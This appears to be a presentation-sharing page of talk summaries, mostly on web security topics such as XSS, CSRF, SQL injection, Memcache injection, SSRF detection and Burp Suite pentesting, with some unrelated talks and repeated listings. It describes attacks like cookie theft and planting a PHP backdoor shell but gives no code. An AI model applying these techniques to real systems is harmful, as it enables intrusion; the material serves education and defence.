The document provides an introduction to web application security and the Damn Vulnerable Web Application (DVWA). It discusses common web vulnerabilities like cross-site scripting (XSS), SQL injection, and information leakage. It demonstrates how to find and exploit these vulnerabilities in DVWA, including stealing cookies, extracting database information, and creating a backdoor PHP shell. The document is intended to educate users about web security risks and show how hackers can compromise applications.
Multi-Tenancy is a critical component of any Software as a Service (SaaS) application, which enables one application instance to serve multiple organizations, or tenants. This presentation by Scott Crespo covers the basics of multi-tenant architectures, and how to implement multi-tenancy using Python, Django, and the open-source project known as Django Tenant Schemas.
Cross Site Request Forgery (CSRF) Scripting Explained
Key Points
What is Cross Site Request Forgery (CSRF)?
How Attack Can Happen?
Damages caused by CSRF?
Mitigations
What is Cross Site Request Forgery (CSRF)?
CSRF is an attack in which attacker forges the request as a trusted user. The request is essentially made to send unintended data to the site. A vulnerable web application assumes that the data is coming from a trusted user.
The root cause is – request coming from browser is trusted by server blindly, if CSRF protection is not implemented.
This “blind trust” lets attacker create a forged request, and make the victim perform that request.
How Attack Can Happen?
Attacker knows about target application, on which the attack is to be performed
Attacker forges request and sends it to victim who may be logged into the website by embedding that forged request into a hyperlink
Victim clicks on it, and unknowingly sends malicious request to website
Website accepts it and processes it. Thus the attacker is successful in performing the attack.
Damages caused by CSRF?
In Net-banking attacker can forge the request and send it to victim to steal money from Victim’s account
Personal health information can be stolen or modified in a hospital database
Attacker force victim to perform unwanted action which affect their profile
Mitigation Techniques
Can be mitigate by two ways
CSRF token (a cookie which is introduced in each form and validated by web app)
Captcha (implemented to ensure that the request is being performed by a human interaction)
The document discusses security misconfiguration as the sixth most dangerous web application vulnerability according to the OWASP Top 10. It defines security misconfiguration as improper configuration settings that can enable attacks. The document outlines how attackers exploit default passwords and privileges, and provides examples of misconfigured systems. It recommends ways to prevent misconfiguration like changing defaults, deleting unnecessary accounts, and keeping systems updated. The document demonstrates how to detect hidden URLs and directory listings using Burp Suite and concludes that misconfiguration poses a high risk if not properly safeguarded against.
Cross-Site Scripting (XSS) is a web security vulnerability that allows attackers to inject client-side scripts into web pages viewed by other users. There are three main types of XSS attacks: reflected XSS, stored XSS, and DOM-based XSS. XSS has been one of the top vulnerabilities on the OWASP Top Ten list for many years. While XSS attacks can compromise user sessions and steal sensitive data, developers can prevent XSS through proper input sanitization and output encoding. As web applications continue to grow in use, jobs in web application security and penetration testing are also expected to increase significantly in the coming years.
Introduction of Ethical Hacking, Life cycle of Hacking, Introduction of Penetration testing, Steps in Penetration Testing, Foot printing Module, Scanning Module, Live Demos on Finding Vulnerabilities a) Bypass Authentication b) Sql Injection c) Cross site Scripting d) File upload Vulnerability (Web Server Hacking) Countermeasures of Securing Web applications
Cross Site Scripting (XSS) is a type of injection attack where malicious scripts are injected into otherwise benign and trusted websites. XSS has been a top web application vulnerability since 1996. There are three main types of XSS attacks: reflected XSS, stored XSS, and DOM-based XSS. Reflected XSS occurs when malicious scripts come from URLs, while stored XSS happens when scripts are stored on websites. XSS can be used to steal cookies and sessions, redirect users, alter website contents, and damage an organization's reputation. Developers can prevent XSS through input validation, output encoding, and using the HttpOnly flag.
Cross-site scripting (XSS) allows malicious code to be injected into web applications, potentially enabling attacks like cookie theft, account hijacking, and phishing. There are three main types of XSS attacks: reflected, stored, and DOM-based. Reflected XSS tricks the user into clicking a malicious link, while stored XSS embeds malicious code directly into the website. DOM-based XSS targets vulnerabilities in client-side scripts. XSS remains a significant threat and proper input validation and output encoding are needed to help prevent attacks.
This document discusses API gateways as a solution for challenges that arise in microservices architectures. It describes how a monolithic architecture can become complex as services grow quickly. In a microservices architecture, clients could communicate directly with each service but this introduces problems around endpoint management, multiple requests, and refactoring difficulties. An API gateway provides a single entry point, routes requests to appropriate services, and aggregates results to address these issues. It then demonstrates Netflix Zuul, an open source API gateway, and provides a demo of its use with Eureka service discovery and routing between hello and goodbye microservices.
Application misconfiguration attacks exploit weaknesses in web applications caused by configuration mistakes. These mistakes include using default passwords and privileges or revealing too much debugging information. Misconfiguration can have minor effects but can also cause major issues like data loss or full system compromise. It is a common problem caused by factors like human error and complex application interfaces. Proper security practices like regular reviews and testing can help detect and prevent misconfiguration vulnerabilities.
This document summarizes web application security testing. It discusses understanding how web applications work and common security risks. It then outlines the main steps of a security test: information gathering, configuration management testing, authentication testing, authorization testing, business logic testing, data validation testing, and denial of service testing. Specific techniques are provided for each step like using tools like Nikto, ZAP, and Hydra or manually testing authentication, injections, error handling, and more.
This document discusses cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks in HTML5. It begins with an overview of the evolution of HTML and the expansion of the browser attack surface with new technologies. It then covers specific XSS vectors using new HTML5 features like media tags, autofocus attributes, and forms. The document also examines how CSRF can be conducted using HTML5 features like XMLHttpRequests and bypassing the same-origin policy and CORS restrictions. Defense techniques like content security policy headers are also discussed.
This document summarizes a presentation about OpenID Connect. OpenID Connect is an identity layer on top of the OAuth 2.0 protocol that allows clients to verify the identity of the user based on the authentication performed by an authorization server, as well as to obtain basic profile information about the user. It defines core functionality for modern identity frameworks by standardizing how clients and servers discover and use identity data exposed by identity providers and how clients can verify that identity data. The presenter discusses how OpenID Connect provides a simple yet powerful way to authenticate users and share attributes about them between websites and applications in an interoperable manner.
This document provides an outline for a presentation on pentesting web applications with Burp Suite. It discusses using Burp Suite to scope a target, map content through spidering and directory bruteforcing, replace automated scanning with manual fuzzing using attack paylists, and test authentication through bruteforcing logins. Specific techniques covered include using the Burp spider, intruder, and engagement tools to discover content and hidden directories, importing wordlists to bruteforce hidden paths, and configuring intruder payloads and grep rules to analyze results from fuzzing and authentication testing.
This document discusses Memcache injection, which is a technique for injecting malicious code into Memcached servers. It demonstrates how to inject newline characters to overwrite cached values and execute arbitrary commands. It also lists some programming languages and libraries that are vulnerable, as well as content management systems that could be impacted. Safe libraries and updated systems that have addressed this issue are also mentioned. The document aims to raise awareness of this Memcached injection technique and provide information to help secure systems.
Shawn Merdinger gave a presentation on Shodan, a search engine for internet-connected devices. He explained that Shodan scans the internet and indexes banners from devices to make them searchable. This allows users to find unprotected devices like IP cameras, industrial control systems, and medical devices. Merdinger showed examples of sensitive devices he discovered, including traffic lights, TV station antennas, and gas station pumps. He emphasized that while concerning, the visibility provided by Shodan can encourage better security practices.
This document outlines a presentation on hacking given by Ömer Çıtak at DEU's 2016 Computer Science Days. The presentation introduces the ADDIE model for designing training and discusses examples of hacking humans, drones, websites, governments, and universities to achieve various targets or results. It concludes by thanking the audience and providing Ömer Çıtak's website and social media information.
Bu döküman Linux nedir neden tercih edilir gibi sorulara cevap arayanlara kısa bir bilgilendirmeden sonra Sanal makinaya Linux Ubuntu dağıtımının kurulumunu göstererek genel linux terminal ve komutlarının anlatımıyla son bulmaktadır.Lİnux ve özgür yazılım farkındalığını artırmak için giriş seviyesinde bir dökumandır.İşinize yaraması dileğiyle iyi çalışmalar.Soru,görüş ve önerileriniz için ahmet@gurelahmet.com a mail atabilirsiniz.
The top 10 security issues in web applications are:
1. Injection flaws such as SQL, OS, and LDAP injection.
2. Cross-site scripting (XSS) vulnerabilities that allow attackers to execute scripts in a victim's browser.
3. Broken authentication and session management, such as not logging users out properly or exposing session IDs.
4. Insecure direct object references where users can directly access files without authorization checks.
5. Cross-site request forgery (CSRF) that tricks a user into performing actions they did not intend.
6. Security misconfiguration of web or application servers.
7. Insecure cryptographic storage of passwords or sensitive data.
8
Defeating Cross-Site Scripting with Content Security Policy (updated)
How a new HTTP response header can help increase the depth of your web application defenses.
Also includes a few slides on HTTP Strict Transport Security, a header which helps protects HTTPS sites from sslstrip attacks.
This is a multi-faceted workshop that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I'll demonstrate how traditional exploits are being used together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I'll then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.
Whatever it takes - Fixing SQLIA and XSS in the process
This document discusses techniques for preventing SQL injection and cross-site scripting (XSS) vulnerabilities. It proposes using prepared statements with separate data and control planes as a "safe query object" approach. It also discusses policy-based sanitization of HTML and focusing code reviews on defect detection through annotating suspicious code regions. The overall goal is to help developers adopt architectures and techniques that thoroughly apply technical solutions to recognize and fix security weaknesses.
The document discusses various security issues that can occur on web portals, including cross-site scripting (XSS) vulnerabilities that allow altering of content or stealing cookies, and cross-site request forgery (CSRF) attacks. It provides examples of how these attacks can be carried out, such as using XSS to change website branding or send a user's cookies to an attacker. The document recommends mitigation techniques like input filtering, consistency checks, and tying sessions to IP addresses to help prevent these types of attacks.
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
The document discusses techniques for fingerprinting web servers by analyzing differences in their responses to common HTTP requests. It then outlines how this information can be used to identify specific web server software and versions. The document also examines how web server fingerprinting could enable cross-site tracing attacks if certain HTTP request methods like TRACE are enabled.
The security of an application is a continuous struggle between solid proactive controls and quality in SDLC versus human weakness and resource restrictions. As the pentester's experience confirms, unfortunatelly even in high-risk (e.g. banking) applications, developed by recognized vendors, the latter often wins - and we end up with critical vulnerabilities.
One of the primary reasons is lack of mechanisms enforcing secure code by default, as opposed to manual adding security per each function. Whenever the secure configuration is not default, there will almost inevitably be bugs, especially in complex systems. I will pinpoint what should be taken into consideration in the architecture and design process of the application. I will show solutions that impose security in ways difficult to circumvent unintentionally by creative developers. I will also share with the audience the pentester's (=attacker's) perspective, and a few clever tricks that made the pentest (=attack) painful, or just rendered the scenarios irrelevant.
The security of an application is a continuous struggle between solid proactive controls and quality in SDLC versus human weakness and resource restrictions. As the pentester's experience confirms, unfortunatelly even in high-risk (e.g. banking) applications, developed by recognized vendors, the latter often wins - and we end up with critical vulnerabilities.
One of the primary reasons is lack of mechanisms enforcing secure code by default, as opposed to manual adding security per each function. Whenever the secure configuration is not default, there will almost inevitably be bugs, especially in complex systems.
I will pinpoint what should be taken into consideration in the architecture and design process of the application. I will show solutions that impose security in ways difficult to circumvent unintentionally by creative developers. I will also share with the audience the pentester's (=attacker's) perspective, and a few clever tricks that made the pentest
(=attack) painful, or just rendered the scenarios irrelevant.
[convergese] Adaptive Images in Responsive Web Design
This document discusses responsive image techniques for adaptive web design. It begins by explaining browser sniffing versus feature testing, and recommends using feature testing to determine browser width, screen resolution, and bandwidth instead of browser sniffing. It then covers techniques like using background-size to control image sizes, SVG for smaller file sizes, and font-based solutions. The document also discusses server-side techniques like .htaccess rewrite rules and client-side techniques like picture and HiSRC. It advocates for a mobile-first approach using CSS media queries and a single pixel GIF for responsive images.
This document summarizes common web application vulnerabilities like SQL injection and cross-site scripting (XSS) for PHP applications. It provides examples of each vulnerability and discusses mitigation strategies like input sanitization, encoding output, and using security frameworks. It also covers other risks like cross-site request forgery (CSRF) and the importance of secure server configurations.
[refreshaustin] Adaptive Images in Responsive Web Design
This document discusses various techniques for responsive images in web design, including browser sniffing versus feature testing, image sizes for different screen resolutions and bandwidths, and different implementation methods like .htaccess files, the <picture> element, and JavaScript libraries. It covers topics like using the browser width to determine layouts, screen resolution detection, and bandwidth testing. Workarounds discussed include using background images, SVGs, icon fonts, and compressed JPEGs. The document advocates a mobile-first approach and using CSS media queries to adapt designs based on screen size.
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
This document summarizes techniques for detecting XXE and SSRF vulnerabilities using DNS records. It describes how an attacker can configure their own DNS server to return their IP address instead of the actual domain, allowing them to detect if the application makes external requests. It also discusses challenges of detecting these vulnerabilities, and provides examples of how to test for them including checking web server access logs for requests to domains controlled by the attacker. The document then covers additional techniques like bypassing content security policies, detecting real users behind Cloudflare, and exploiting URL encoding to bypass input filtering.
This document provides an overview of the Open Web Application Security Project (OWASP). It discusses OWASP's mission to improve application security and lists some of its key projects, including the OWASP Top Ten, a list of the most critical web application security flaws. It also summarizes several common security testing techniques like information gathering, authentication testing, session management testing, and input validation testing. Tools are mentioned for each technique.
This document discusses techniques for building scalable websites with Perl, including:
1) Caching at various levels (page, partial page, and database caching) to improve performance and reduce load on application servers.
2) Using job queuing and worker processes to distribute processing-intensive tasks asynchronously instead of blocking web requests.
3) Leveraging caching and queueing libraries like Cache::FastMmap, Memcached, and Spread::Queue to implement caching and job queueing in Perl applications.
[rwdsummit] Adaptive Images in Responsive Web Design
The document summarizes Christopher Schmitt's presentation at RWD Summit 2014 on adaptive images in responsive web design. It discusses using feature testing over browser sniffing to determine screen resolution and bandwidth. It presents techniques like srcset, picture, and JavaScript solutions to serve appropriately sized images. It also covers workarounds like background-size, SVG, and font-based solutions when native techniques are not supported. The focus is on building responsive images that scale with the device and load quickly.
The document discusses various techniques for hacking client-side insecurities, including discovering clients on the internet and intranet, attacking client-side through JavaScript jacking and pluggable protocol handlers, exploiting cross-site request forgery vulnerabilities, and fingerprinting clients through analysis of HTTP headers and browser information leaks. The presentation aims to demonstrate these hacking techniques through examples and a question/answer session.
[cssdevconf] Adaptive Images in Responsive Web Design
This document summarizes Christopher Schmitt's presentation on adaptive images in responsive web design. The presentation covered:
1. Using the browser width, screen resolution, and bandwidth to determine the appropriate image to serve through feature testing rather than browser sniffing.
2. Techniques for serving responsive images including using .htaccess files, the <picture> element, and JavaScript libraries like HiSRC that select images based on various tests.
3. Workarounds for older browsers including using background-size: 100%, SVG images, and font-based solutions.
Caution: This is a dated presentation; uploaded for reference. While the principles remain valid, specifics may have changed.
This presentation was made for software developers in Chandigarh - as a part of the NULL & OWASP Chandigarh Chapter activities.
It covers the basics of secure software development and secure coding using OWASP Top 10 as a broad guide.
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
The document discusses security vulnerabilities found in the web interfaces of security gateways. The author details how they used automated scanners, manual testing with Burp, and SSH access to root to find over 35 exploits in various security gateway products since 2011. Common vulnerabilities included input validation issues, predictable URLs and parameters enabling CSRF, excessive privileges, and session management flaws. The author provides examples of compromising ClearOS and Websense gateways, and demonstrates OSRF through Proofpoint's email system. They conclude many techniques are older but there remains a knowledge gap between secure web and UI development.
Understanding Insider Security Threats: Types, Examples, Effects, and Mitigat...
Today’s digitally connected world presents a wide range of security challenges for enterprises. Insider security threats are particularly noteworthy because they have the potential to cause significant harm. Unlike external threats, insider risks originate from within the company, making them more subtle and challenging to identify. This blog aims to provide a comprehensive understanding of insider security threats, including their types, examples, effects, and mitigation techniques.
Kief Morris rethinks the infrastructure code delivery lifecycle, advocating for a shift towards composable infrastructure systems. We should shift to designing around deployable components rather than code modules, use more useful levels of abstraction, and drive design and deployment from applications rather than bottom-up, monolithic architecture and delivery.
Choose our Linux Web Hosting for a seamless and successful online presence
Our Linux Web Hosting plans offer unbeatable performance, security, and scalability, ensuring your website runs smoothly and efficiently.
Visit- https://onliveserver.com/linux-web-hosting/
Best Practices for Effectively Running dbt in Airflow.pdf
As a popular open-source library for analytics engineering, dbt is often used in combination with Airflow. Orchestrating and executing dbt models as DAGs ensures an additional layer of control over tasks, observability, and provides a reliable, scalable environment to run dbt models.
This webinar will cover a step-by-step guide to Cosmos, an open source package from Astronomer that helps you easily run your dbt Core projects as Airflow DAGs and Task Groups, all with just a few lines of code. We’ll walk through:
- Standard ways of running dbt (and when to utilize other methods)
- How Cosmos can be used to run and visualize your dbt projects in Airflow
- Common challenges and how to address them, including performance, dependency conflicts, and more
- How running dbt projects in Airflow helps with cost optimization
Webinar given on 9 July 2024
Measuring the Impact of Network Latency at Twitter
Widya Salim and Victor Ma will outline the causal impact analysis, framework, and key learnings used to quantify the impact of reducing Twitter's network latency.
If you’ve ever had to analyze a map or GPS data, chances are you’ve encountered and even worked with coordinate systems. As historical data continually updates through GPS, understanding coordinate systems is increasingly crucial. However, not everyone knows why they exist or how to effectively use them for data-driven insights.
During this webinar, you’ll learn exactly what coordinate systems are and how you can use FME to maintain and transform your data’s coordinate systems in an easy-to-digest way, accurately representing the geographical space that it exists within. During this webinar, you will have the chance to:
- Enhance Your Understanding: Gain a clear overview of what coordinate systems are and their value
- Learn Practical Applications: Why we need datams and projections, plus units between coordinate systems
- Maximize with FME: Understand how FME handles coordinate systems, including a brief summary of the 3 main reprojectors
- Custom Coordinate Systems: Learn how to work with FME and coordinate systems beyond what is natively supported
- Look Ahead: Gain insights into where FME is headed with coordinate systems in the future
Don’t miss the opportunity to improve the value you receive from your coordinate system data, ultimately allowing you to streamline your data analysis and maximize your time. See you there!
An introduction to REST and RESTful web services.
You can take the course below to learn about REST & RESTful web services.
https://www.udemy.com/building-php-restful-web-services/
Multi-Tenancy is a critical component of any Software as a Service (SaaS) application, which enables one application instance to serve multiple organizations, or tenants. This presentation by Scott Crespo covers the basics of multi-tenant architectures, and how to implement multi-tenancy using Python, Django, and the open-source project known as Django Tenant Schemas.
Cross Site Request Forgery (CSRF) Scripting ExplainedValency Networks
Key Points
What is Cross Site Request Forgery (CSRF)?
How Attack Can Happen?
Damages caused by CSRF?
Mitigations
What is Cross Site Request Forgery (CSRF)?
CSRF is an attack in which attacker forges the request as a trusted user. The request is essentially made to send unintended data to the site. A vulnerable web application assumes that the data is coming from a trusted user.
The root cause is – request coming from browser is trusted by server blindly, if CSRF protection is not implemented.
This “blind trust” lets attacker create a forged request, and make the victim perform that request.
How Attack Can Happen?
Attacker knows about target application, on which the attack is to be performed
Attacker forges request and sends it to victim who may be logged into the website by embedding that forged request into a hyperlink
Victim clicks on it, and unknowingly sends malicious request to website
Website accepts it and processes it. Thus the attacker is successful in performing the attack.
Damages caused by CSRF?
In Net-banking attacker can forge the request and send it to victim to steal money from Victim’s account
Personal health information can be stolen or modified in a hospital database
Attacker force victim to perform unwanted action which affect their profile
Mitigation Techniques
Can be mitigate by two ways
CSRF token (a cookie which is introduced in each form and validated by web app)
Captcha (implemented to ensure that the request is being performed by a human interaction)
The document discusses security misconfiguration as the sixth most dangerous web application vulnerability according to the OWASP Top 10. It defines security misconfiguration as improper configuration settings that can enable attacks. The document outlines how attackers exploit default passwords and privileges, and provides examples of misconfigured systems. It recommends ways to prevent misconfiguration like changing defaults, deleting unnecessary accounts, and keeping systems updated. The document demonstrates how to detect hidden URLs and directory listings using Burp Suite and concludes that misconfiguration poses a high risk if not properly safeguarded against.
Cross-Site Scripting (XSS) is a web security vulnerability that allows attackers to inject client-side scripts into web pages viewed by other users. There are three main types of XSS attacks: reflected XSS, stored XSS, and DOM-based XSS. XSS has been one of the top vulnerabilities on the OWASP Top Ten list for many years. While XSS attacks can compromise user sessions and steal sensitive data, developers can prevent XSS through proper input sanitization and output encoding. As web applications continue to grow in use, jobs in web application security and penetration testing are also expected to increase significantly in the coming years.
Introduction of Ethical Hacking, Life cycle of Hacking, Introduction of Penetration testing, Steps in Penetration Testing, Foot printing Module, Scanning Module, Live Demos on Finding Vulnerabilities a) Bypass Authentication b) Sql Injection c) Cross site Scripting d) File upload Vulnerability (Web Server Hacking) Countermeasures of Securing Web applications
Cross Site Scripting (XSS) is a type of injection attack where malicious scripts are injected into otherwise benign and trusted websites. XSS has been a top web application vulnerability since 1996. There are three main types of XSS attacks: reflected XSS, stored XSS, and DOM-based XSS. Reflected XSS occurs when malicious scripts come from URLs, while stored XSS happens when scripts are stored on websites. XSS can be used to steal cookies and sessions, redirect users, alter website contents, and damage an organization's reputation. Developers can prevent XSS through input validation, output encoding, and using the HttpOnly flag.
Cross-site scripting (XSS) allows malicious code to be injected into web applications, potentially enabling attacks like cookie theft, account hijacking, and phishing. There are three main types of XSS attacks: reflected, stored, and DOM-based. Reflected XSS tricks the user into clicking a malicious link, while stored XSS embeds malicious code directly into the website. DOM-based XSS targets vulnerabilities in client-side scripts. XSS remains a significant threat and proper input validation and output encoding are needed to help prevent attacks.
This document discusses API gateways as a solution for challenges that arise in microservices architectures. It describes how a monolithic architecture can become complex as services grow quickly. In a microservices architecture, clients could communicate directly with each service but this introduces problems around endpoint management, multiple requests, and refactoring difficulties. An API gateway provides a single entry point, routes requests to appropriate services, and aggregates results to address these issues. It then demonstrates Netflix Zuul, an open source API gateway, and provides a demo of its use with Eureka service discovery and routing between hello and goodbye microservices.
Application misconfiguration attacks exploit weaknesses in web applications caused by configuration mistakes. These mistakes include using default passwords and privileges or revealing too much debugging information. Misconfiguration can have minor effects but can also cause major issues like data loss or full system compromise. It is a common problem caused by factors like human error and complex application interfaces. Proper security practices like regular reviews and testing can help detect and prevent misconfiguration vulnerabilities.
This document summarizes web application security testing. It discusses understanding how web applications work and common security risks. It then outlines the main steps of a security test: information gathering, configuration management testing, authentication testing, authorization testing, business logic testing, data validation testing, and denial of service testing. Specific techniques are provided for each step like using tools like Nikto, ZAP, and Hydra or manually testing authentication, injections, error handling, and more.
This document discusses cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks in HTML5. It begins with an overview of the evolution of HTML and the expansion of the browser attack surface with new technologies. It then covers specific XSS vectors using new HTML5 features like media tags, autofocus attributes, and forms. The document also examines how CSRF can be conducted using HTML5 features like XMLHttpRequests and bypassing the same-origin policy and CORS restrictions. Defense techniques like content security policy headers are also discussed.
This document summarizes a presentation about OpenID Connect. OpenID Connect is an identity layer on top of the OAuth 2.0 protocol that allows clients to verify the identity of the user based on the authentication performed by an authorization server, as well as to obtain basic profile information about the user. It defines core functionality for modern identity frameworks by standardizing how clients and servers discover and use identity data exposed by identity providers and how clients can verify that identity data. The presenter discusses how OpenID Connect provides a simple yet powerful way to authenticate users and share attributes about them between websites and applications in an interoperable manner.
This document provides an outline for a presentation on pentesting web applications with Burp Suite. It discusses using Burp Suite to scope a target, map content through spidering and directory bruteforcing, replace automated scanning with manual fuzzing using attack paylists, and test authentication through bruteforcing logins. Specific techniques covered include using the Burp spider, intruder, and engagement tools to discover content and hidden directories, importing wordlists to bruteforce hidden paths, and configuring intruder payloads and grep rules to analyze results from fuzzing and authentication testing.
This document discusses Memcache injection, which is a technique for injecting malicious code into Memcached servers. It demonstrates how to inject newline characters to overwrite cached values and execute arbitrary commands. It also lists some programming languages and libraries that are vulnerable, as well as content management systems that could be impacted. Safe libraries and updated systems that have addressed this issue are also mentioned. The document aims to raise awareness of this Memcached injection technique and provide information to help secure systems.
Shodan Search Engine: Amphion Forum San Franciscoshawn_merdinger
Shawn Merdinger gave a presentation on Shodan, a search engine for internet-connected devices. He explained that Shodan scans the internet and indexes banners from devices to make them searchable. This allows users to find unprotected devices like IP cameras, industrial control systems, and medical devices. Merdinger showed examples of sensitive devices he discovered, including traffic lights, TV station antennas, and gas station pumps. He emphasized that while concerning, the visibility provided by Shodan can encourage better security practices.
Bir Şeyi Hacklemek (DEU ACM Bilişim Günleri 2016)Ömer Çıtak
This document outlines a presentation on hacking given by Ömer Çıtak at DEU's 2016 Computer Science Days. The presentation introduces the ADDIE model for designing training and discusses examples of hacking humans, drones, websites, governments, and universities to achieve various targets or results. It concludes by thanking the audience and providing Ömer Çıtak's website and social media information.
Linux'a Giris ve VirtualBox a Ubuntu KurulumuAhmet Gürel
Bu döküman Linux nedir neden tercih edilir gibi sorulara cevap arayanlara kısa bir bilgilendirmeden sonra Sanal makinaya Linux Ubuntu dağıtımının kurulumunu göstererek genel linux terminal ve komutlarının anlatımıyla son bulmaktadır.Lİnux ve özgür yazılım farkındalığını artırmak için giriş seviyesinde bir dökumandır.İşinize yaraması dileğiyle iyi çalışmalar.Soru,görüş ve önerileriniz için ahmet@gurelahmet.com a mail atabilirsiniz.
The top 10 security issues in web applicationsDevnology
The top 10 security issues in web applications are:
1. Injection flaws such as SQL, OS, and LDAP injection.
2. Cross-site scripting (XSS) vulnerabilities that allow attackers to execute scripts in a victim's browser.
3. Broken authentication and session management, such as not logging users out properly or exposing session IDs.
4. Insecure direct object references where users can directly access files without authorization checks.
5. Cross-site request forgery (CSRF) that tricks a user into performing actions they did not intend.
6. Security misconfiguration of web or application servers.
7. Insecure cryptographic storage of passwords or sensitive data.
8
Defeating Cross-Site Scripting with Content Security Policy (updated)Francois Marier
How a new HTTP response header can help increase the depth of your web application defenses.
Also includes a few slides on HTTP Strict Transport Security, a header which helps protects HTTPS sites from sslstrip attacks.
This is a multi-faceted workshop that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I'll demonstrate how traditional exploits are being used together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I'll then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
This document discusses techniques for preventing SQL injection and cross-site scripting (XSS) vulnerabilities. It proposes using prepared statements with separate data and control planes as a "safe query object" approach. It also discusses policy-based sanitization of HTML and focusing code reviews on defect detection through annotating suspicious code regions. The overall goal is to help developers adopt architectures and techniques that thoroughly apply technical solutions to recognize and fix security weaknesses.
The document discusses various security issues that can occur on web portals, including cross-site scripting (XSS) vulnerabilities that allow altering of content or stealing cookies, and cross-site request forgery (CSRF) attacks. It provides examples of how these attacks can be carried out, such as using XSS to change website branding or send a user's cookies to an attacker. The document recommends mitigation techniques like input filtering, consistency checks, and tying sessions to IP addresses to help prevent these types of attacks.
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Jeremiah Grossman
The document discusses techniques for fingerprinting web servers by analyzing differences in their responses to common HTTP requests. It then outlines how this information can be used to identify specific web server software and versions. The document also examines how web server fingerprinting could enable cross-site tracing attacks if certain HTTP request methods like TRACE are enabled.
The security of an application is a continuous struggle between solid proactive controls and quality in SDLC versus human weakness and resource restrictions. As the pentester's experience confirms, unfortunatelly even in high-risk (e.g. banking) applications, developed by recognized vendors, the latter often wins - and we end up with critical vulnerabilities.
One of the primary reasons is lack of mechanisms enforcing secure code by default, as opposed to manual adding security per each function. Whenever the secure configuration is not default, there will almost inevitably be bugs, especially in complex systems. I will pinpoint what should be taken into consideration in the architecture and design process of the application. I will show solutions that impose security in ways difficult to circumvent unintentionally by creative developers. I will also share with the audience the pentester's (=attacker's) perspective, and a few clever tricks that made the pentest (=attack) painful, or just rendered the scenarios irrelevant.
The security of an application is a continuous struggle between solid proactive controls and quality in SDLC versus human weakness and resource restrictions. As the pentester's experience confirms, unfortunatelly even in high-risk (e.g. banking) applications, developed by recognized vendors, the latter often wins - and we end up with critical vulnerabilities.
One of the primary reasons is lack of mechanisms enforcing secure code by default, as opposed to manual adding security per each function. Whenever the secure configuration is not default, there will almost inevitably be bugs, especially in complex systems.
I will pinpoint what should be taken into consideration in the architecture and design process of the application. I will show solutions that impose security in ways difficult to circumvent unintentionally by creative developers. I will also share with the audience the pentester's (=attacker's) perspective, and a few clever tricks that made the pentest
(=attack) painful, or just rendered the scenarios irrelevant.
This document discusses responsive image techniques for adaptive web design. It begins by explaining browser sniffing versus feature testing, and recommends using feature testing to determine browser width, screen resolution, and bandwidth instead of browser sniffing. It then covers techniques like using background-size to control image sizes, SVG for smaller file sizes, and font-based solutions. The document also discusses server-side techniques like .htaccess rewrite rules and client-side techniques like picture and HiSRC. It advocates for a mobile-first approach using CSS media queries and a single pixel GIF for responsive images.
This document summarizes common web application vulnerabilities like SQL injection and cross-site scripting (XSS) for PHP applications. It provides examples of each vulnerability and discusses mitigation strategies like input sanitization, encoding output, and using security frameworks. It also covers other risks like cross-site request forgery (CSRF) and the importance of secure server configurations.
This document discusses various techniques for responsive images in web design, including browser sniffing versus feature testing, image sizes for different screen resolutions and bandwidths, and different implementation methods like .htaccess files, the <picture> element, and JavaScript libraries. It covers topics like using the browser width to determine layouts, screen resolution detection, and bandwidth testing. Workarounds discussed include using background images, SVGs, icon fonts, and compressed JPEGs. The document advocates a mobile-first approach and using CSS media queries to adapt designs based on screen size.
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...OWASP Russia
This document summarizes techniques for detecting XXE and SSRF vulnerabilities using DNS records. It describes how an attacker can configure their own DNS server to return their IP address instead of the actual domain, allowing them to detect if the application makes external requests. It also discusses challenges of detecting these vulnerabilities, and provides examples of how to test for them including checking web server access logs for requests to domains controlled by the attacker. The document then covers additional techniques like bypassing content security policies, detecting real users behind Cloudflare, and exploiting URL encoding to bypass input filtering.
This document provides an overview of the Open Web Application Security Project (OWASP). It discusses OWASP's mission to improve application security and lists some of its key projects, including the OWASP Top Ten, a list of the most critical web application security flaws. It also summarizes several common security testing techniques like information gathering, authentication testing, session management testing, and input validation testing. Tools are mentioned for each technique.
This document discusses techniques for building scalable websites with Perl, including:
1) Caching at various levels (page, partial page, and database caching) to improve performance and reduce load on application servers.
2) Using job queuing and worker processes to distribute processing-intensive tasks asynchronously instead of blocking web requests.
3) Leveraging caching and queueing libraries like Cache::FastMmap, Memcached, and Spread::Queue to implement caching and job queueing in Perl applications.
The document summarizes Christopher Schmitt's presentation at RWD Summit 2014 on adaptive images in responsive web design. It discusses using feature testing over browser sniffing to determine screen resolution and bandwidth. It presents techniques like srcset, picture, and JavaScript solutions to serve appropriately sized images. It also covers workarounds like background-size, SVG, and font-based solutions when native techniques are not supported. The focus is on building responsive images that scale with the device and load quickly.
The document discusses various techniques for hacking client-side insecurities, including discovering clients on the internet and intranet, attacking client-side through JavaScript jacking and pluggable protocol handlers, exploiting cross-site request forgery vulnerabilities, and fingerprinting clients through analysis of HTTP headers and browser information leaks. The presentation aims to demonstrate these hacking techniques through examples and a question/answer session.
This document summarizes Christopher Schmitt's presentation on adaptive images in responsive web design. The presentation covered:
1. Using the browser width, screen resolution, and bandwidth to determine the appropriate image to serve through feature testing rather than browser sniffing.
2. Techniques for serving responsive images including using .htaccess files, the <picture> element, and JavaScript libraries like HiSRC that select images based on various tests.
3. Workarounds for older browsers including using background-size: 100%, SVG images, and font-based solutions.
Caution: This is a dated presentation; uploaded for reference. While the principles remain valid, specifics may have changed.
This presentation was made for software developers in Chandigarh - as a part of the NULL & OWASP Chandigarh Chapter activities.
